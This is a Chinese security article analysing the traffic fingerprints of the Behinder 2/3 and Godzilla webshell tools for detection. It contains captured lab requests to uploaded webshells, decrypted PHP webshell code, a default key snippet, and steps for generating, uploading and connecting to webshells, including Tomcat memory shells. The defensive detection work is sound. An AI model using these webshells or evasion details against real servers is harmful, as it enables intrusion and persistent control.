冰蝎2和3及哥斯拉Godzilla特征分析

  • A+
所属分类:安全文章

冰蝎2

冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端。

冰蝎工具通信原理

冰蝎的通信过程可以分为两个阶段:

密钥协商

加密传输

1)第一阶段-密钥协商

a.php

攻击者通过GET方式请求服务器密钥;

GET /hackable/uploads/shell.php?pass=300 HTTP/1.1

冰蝎2和3及哥斯拉Godzilla特征分析

当我们输入命令操作后,请求方式就会变成POST

POST /hackable/uploads/shell.php HTTP/1.1Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=lsgi7fb09enqcn3svmti4eqbo7; path=/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1Cache-Control: no-cachePragma: no-cacheHost: 192.168.0.129:777Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: keep-aliveContent-Length: 1112hxx/2GPvW+iHRI+j7FKIjpbHv6JcLQzyNs8uQ1IPDTB2xcS5+oKiaSKujjcZ/uYLEwn6oA8a1YehtGbT9arlXe3LaA0kig9BITcK3iZZKYhjpK0/ziTfTa5CnU3lfrnmCcadnmtgUKyTZDdb93DSqwyGn3cFb7BuIPkdCu6SpLov3+EExlHPbY/+6PiiDIpWGCxzkEIwli6zJiS8fa4fSxYcr/e0viSLVI3eXHAvhcohXLsVbWV5HmZMovp4EHYkcofLdR7fjx+NZbIfBOTZfzbOTOXBRBI2GBEUZG4uzi7s0xeHzUWeKf/n+CjrCs1OgYT893Q5KyRSr9+wn3Gi8JfDYPKCady

b.jsp

先通过GET方法,向服务器请求随机密钥

GET /s.jsp?pass=987 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko) Maxthon/3.0 Safari/534.12Host: 192.168.0.132:555Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: keep-aliveHTTP/1.1 200 OKServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=D89B13E292E0D8D7CD9433522F293EDB; Path=/; HttpOnlyContent-Type: text/html;charset=ISO-8859-1Content-Length: 16   Date: Wed, 18 Nov 2020 12:32:58 GMT9e39ae1ad6ee9e32  //服务器返回的密钥

同样输入命令后,也和PHP一样,请求方式就变成了POST

POST /s.jsp HTTP/1.1Content-Type: application/octet-streamCookie: JSESSIONID=D89B13E292E0D8D7CD9433522F293EDB; Path=/; HttpOnlyUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko) Maxthon/3.0 Safari/534.12Cache-Control: no-cachePragma: no-cacheHost: 192.168.0.132:555Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: keep-aliveContent-Length: 855675Zv64K/CymLAnv5UhDhKfJdj58rU1o/0yZ7D0XlJU7MgTbzaA4zrvImnNs1Y1cmNPGAdxaaEaYxvasJSp2sCHk5TPv+fWunDMvZWoBqjcnkHGMYyohZpH1v7OvWcdAZPg7CIL87y9HPc2lydWTiBVspavD0FkRVY7/XmeWw7m/O42+SE28iQSgyLf/

2)服务器使用密钥

使用随机数MD5的高16位作为密钥,存储到会话的 $_SESSION 变量中,并返回密钥给攻击者。

3)解密

刚才php请求密钥的数据包中获取到的密钥:

95c4e8e4eef4b1ac  //服务器返回的密钥

a.请求密文

冰蝎2和3及哥斯拉Godzilla特征分析b.输入密钥和请求密文,解密后为 base64 编码

冰蝎2和3及哥斯拉Godzilla特征分析

c.base64解码

@error_reporting(0);function main($content){$result = array();$result["status"] = base64_encode("success");$result["msg"] = base64_encode($content);$key = $_SESSION['k'];echo encrypt(json_encode($result),$key);}function encrypt($data,$key){if(!extension_loaded('openssl')){for($i=0;$i<strlen($data);$i++) {$data[$i] = $data[$i]^$key[$i+1&15]; }return $data;}else{return openssl_encrypt($data, "AES128", $key);}}$content="327c829b-f4d3-41eb-a251-d561e01011ec";main($content);

4)特征总结

a.ACCEPT字段

冰蝎2默认Accept字段的值很特殊,而且每个阶段都一样

Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

b.UA字段

冰蝎内置了十余种 UserAgent ,每次连接 shell 会随机选择一个进行使用。但都是比较老的,容易被检测到,但是可以在burp中修改ua头。

c.Content-Length

Content-Length: 16, 16就是冰蝎2连接的特征

冰蝎3

对比冰蝎2,冰蝎3取消动态密钥获取,目前很多waf等设备都做了冰蝎2的流量特征分析,所以3取消了动态密钥获取;只有在无动态密钥交互失败后,才会进入常规的密钥交互阶段。

<[email protected]_reporting(0);session_start();$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond$_SESSION['k']=$key;

密钥生成可以看出,使用密码的md5结果的前16位。

特征分析

php抓包

看包没有发现什么特征,但是可以发现它是POST请求的

1)Accept头有application/xhtml+xmlapplication/xmlapplication/signed-exchange属于弱特征

2)ua头该特征属于弱特征。通过burp可以修改,冰蝎3.0内置的默认16个userAgent都比较老。现实生活中很少有人使用,所以这个也可以作为waf规则特征。

POST /hackable/uploads/shell.php HTTP/1.1Content-Type: text/html;charset=utf-8Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36Cache-Control: no-cachePragma: no-cacheHost: 192.168.0.132:777Connection: keep-aliveContent-Length: 1432Cookie: PHPSESSID=peimnpkc4hi70akr2seroj6mi23Mn1yNMtoZViV5wotQHPJtwwj0F4b2lyToNK7LfdUnN7zmyQFfx/zaiGwUHg+8SlXZemCLBkDIvxiBIGd6bgOEiZtNpn6YmnWiiaCBNbXkC5JWFTARrD8lCOCQ4ZVFjsJFDaAOwzinbqne/oYuNwWjQvKM9ii2RE/b+Gc+ya2f4+OIDU2Wk/QSIL7GOAoyaUYZSq4bL2wmX5RnP1Lbf7S+TAy3K7JPruBiZeZGC/ay14vUj4+IgmNHwEAzWl3DNIsL1yhH4Do5FI8HwZpG5XnrZwpKdFIEgN4GKmcDODTdO2pj8DVXCwes3m+v/wRykVd++xsex2EkGn9p0SgL+GpXlGg6Ol

jsp抓包

特征分析Content-Type: application/octet-stream 这是一个强特征查阅资料可知octet-stream的意思是,只能提交二进制,而且只能提交一个二进制,如果提交文件的话,只能提交一个文件,后台接收参数只能有一个,而且只能是流(或者字节数组);很少使用。

POST /3.jsp HTTP/1.1Content-Type: application/octet-streamAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15Cache-Control: no-cachePragma: no-cacheHost: x.x.x.x:888Connection: keep-aliveContent-Length: 11864Cookie: JSESSIONID=F063F33F5F8BE2F3C75311C7128E70D1F1w4ahdSJGUxG3t11sfr6qxbThq9VnL7i6K1/NzHsb0s9eQIfj2qDW/r5OeNJjI0U/BrUp2pHtrtCkdiUeJVIKFzCMSfe8yhEddJFJideje6Eb0dtrHHd9YYaZcxqQL2FFusmCXFICrCh3MsG+BYZHKbNVkWJrsTiu/1VBPV9CBkJzPBO4aH98EBFycyQbpGCHjAPaZmbaIIVWenbm642/xYr85uQ5/K74vlQ9wR5iGLZvyH8WZOF0YpqhxjkApKeShoSGX/C87NiqMTVAB+DcFNf4HaitS1o7Q6kXnUET00L5irn+WdNis2mvNEzr+DGay6LSKKD9kDl6iTKD/1aiXfk5EgH4PfR0/aXCEKTsFW29So6wbhR6u4H3/

Godzilla特征分析

介绍

哥斯拉是一个基于流量、HTTP全加密的webshell管理工具相对于蚁剑,冰蝎;哥斯拉具有以下优点。

全部类型的shell均过市面所有静态查杀

流量加密过市面全部流量waf

Godzilla自带的插件是冰蝎、蚁剑不能比拟的

使用

(1)Godzilla的运行需要java环境。在cmd下切换到哥斯拉所在目录,输入

java -jarGodzilla.jar

此时会在同目录下生成data.db数据库存放数据(2)Godzilla的webshell可以自定义生成操作方法:管理-生成所需的webshell,哥斯拉支持jsp、php、aspx等多种载荷java和c#的载荷原生实现AES加密

冰蝎2和3及哥斯拉Godzilla特征分析

PHP使用亦或加密

冰蝎2和3及哥斯拉Godzilla特征分析

(3)将生成的webshell上传到目标机器,然后在Godzilla目标栏添加相应的url

PHP连接特征

(1)php_XOR_BASE64

设置代理,用burp抓包。截取到特征发现请求都含有”pass=”第一个包

POST /hackable/uploads/base.php HTTP/1.1User-Agent: Java/1.8.0_131Host: 192.168.0.132:777Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-type: application/x-www-form-urlencodedContent-Length: 23275Connection: closepass=KX4nWAFVJ005aWdeUVosCjpuL0k7YApWKGVGfHFTUXg5WDNFOwszSQEDAVVRWjdGKHU3RwBgLEkGRgV5e3cgVCpxP0YBVVBRB3d3WlFZJ0c5bjdcAVEGUgB2BEh%2BXQJeMGMdQAMKN2MBAmALeE1UWjpuK1wsUjN%2FAVx7RGhzNFwpBFRcBn9YTylIXkJ9Q1F4J2cKVyt7IF4CZmxVeXczVTYGM2Q3CA1pN11GW2taDUQ6bitKOgpYTjlmAFRrWSdJOWE3QAFRK10zZQQCUVo3XyhuFn4hUSBeKnJ0VXt3IFQycS8FAX8nQwAADERRczdGOwQvWAEKN1ICaXxdeWASfSBfJFcreyMAJ2BafHFdIFQqdSdJOGAzCABcAVVrWSdJOWI8ADBvVFMBA2deeXM3ATphHXcGb1RTKHJeQn1DUXgFZ1V7JmkRVAdmAFhWcw1FAV8nWQdgI1EAAntUUAcjXwFaXFk7YC9VOXZZS3l3DQQnZwpXK3sgXgJmbF17YSNeAmEdXDoKNw0CaXsCUU0GXTpYCUc7YC9DOwMMRWhjVFU6WyNKOG8zSQBYVkJ5bBJ9IF8kVyt7IF4qcnRVY3NQQTlxCUkpewVQBml3WlE

第二个包

POST /hackable/uploads/base.php HTTP/1.1User-Agent: Java/1.8.0_131Host: 192.168.0.132:777Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-type: application/x-www-form-urlencodedContent-Length: 51Connection: closepass=AWEzAAN%2FWFI3XHNGaGBQWDEHPwY4fSQAM2AIDw%3D%3D

(2)php_XOR_RAW

执行ls和cat命令,命令虽然不同,但是发现请求中都含有一样的

:•T[6•L9e

ls命令的包

POST /hackable/uploads/g.php HTTP/1.1Cookie: PHPSESSID=oo9hn9d3uqq7661o3oldu0ojo7;User-Agent: Java/1.8.0_131Host: 192.168.0.132:777Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-type: application/x-www-form-urlencodedContent-Length: 56Connection: close:•T[6•L9e•[aqP•)[T••O9t

cat命令的包

POST /hackable/uploads/g.php HTTP/1.1Cookie: PHPSESSID=oo9hn9d3uqq7661o3oldu0ojo7;User-Agent: Java/1.8.0_131Host: 192.168.0.132:777Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-type: application/x-www-form-urlencodedContent-Length: 72Connection: close:•T[6•L9e•h•_8D0c+r•}•L6[gYccY)[T••O9t

当以为这就是特征时就大错特错了,这只是这一次连接所含有的特征

jsp连接特征

(1)java_AES_BASE64

POST /gejs.jsp HTTP/1.1User-Agent: Java/1.8.0_131Host: 192.168.0.132:555Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-type: application/x-www-form-urlencodedContent-Length: 33035Connection: closepass=0%2FMHwbBP6vuX0WyYztOU9DrUPcD0Zwx0KhArobwwHBDld91Y8xrUqPxo40dKoSbGd%2FxDF4yJopsUIHMI8NMfFUl0oxBzWPyMdTmxAntagmMGLGiqB1ckbl5G%2FlapnewWrvhhdqtj0eT2zvUes%2Bg6yhFGVjLstoOdJxkYPY6XB70AeffugDlCkUYAyHyrTymPocUs14sKD5ItAn5147goo9TAdBH0kgSNlxbqxMqTPbgjKljsvC53fFB%2BO5jKUBCBvsCR1W%2FLhPA42qp1e%2Fl0cmUohwSAT3N0s9r%2FzRVlB3lQkXnV895dz48DyPbYjJp%2Bhpf1qFjbCy1o8Zd771ObGbKvWr1O5PZOTNKBuHTTP/1.1 200 OKServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=509B4522D1A54112AA93CCAE0311FEFD; Path=/; HttpOnlyContent-Type: text/htmlContent-Length: 0Date: Wed, 18 Nov 2020 15:04:32 GMTConnection: close

与php请求一样都含有”pass=”而且发起连接时服务器返回的Content-Length是0

(2)java_AES_RAW

POST /rwj.jsp HTTP/1.1User-Agent: Java/1.8.0_131Host: 192.168.0.132:555Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-type: application/x-www-form-urlencodedContent-Length: 23360Connection: closeÓó•Á°Oêû•Ñl•ÎÓ•ô:Ô=Àôg•t*•+¡¼0••åwÝXó•Ô¨ühãGJ¡&ÆwüC•••¢••s•ðÓ••It£•sXü•u9±•{Z•c•,hª•W$n^FþV©•ì•®øav«cÑäöÎõ•³è:ÊHTTP/1.1 200 OKServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=1C26762D96A561D4A63BDE104E22930C; Path=/; HttpOnlyContent-Type: text/htmlContent-Length: 0Date: Wed, 18 Nov 2020 15:19:56 GMTConnection: close

内存马

内存shell模块实现了在tomcat中上传一个哥斯拉的马或者冰蝎、菜刀的马。甚至是上传regeorg建立http隧道。

冰蝎2和3及哥斯拉Godzilla特征分析在这里我选择上传一个冰蝎马。

冰蝎2和3及哥斯拉Godzilla特征分析然后在冰蝎连接,成功连接。

冰蝎2和3及哥斯拉Godzilla特征分析

内存shell 无日志,会在tomcat重启后消失。

冰蝎2和3及哥斯拉Godzilla特征分析

精彩推荐





冰蝎2和3及哥斯拉Godzilla特征分析
冰蝎2和3及哥斯拉Godzilla特征分析冰蝎2和3及哥斯拉Godzilla特征分析

冰蝎2和3及哥斯拉Godzilla特征分析冰蝎2和3及哥斯拉Godzilla特征分析冰蝎2和3及哥斯拉Godzilla特征分析

冰蝎2和3及哥斯拉Godzilla特征分析

本文始发于微信公众号(FreeBuf):冰蝎2和3及哥斯拉Godzilla特征分析

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: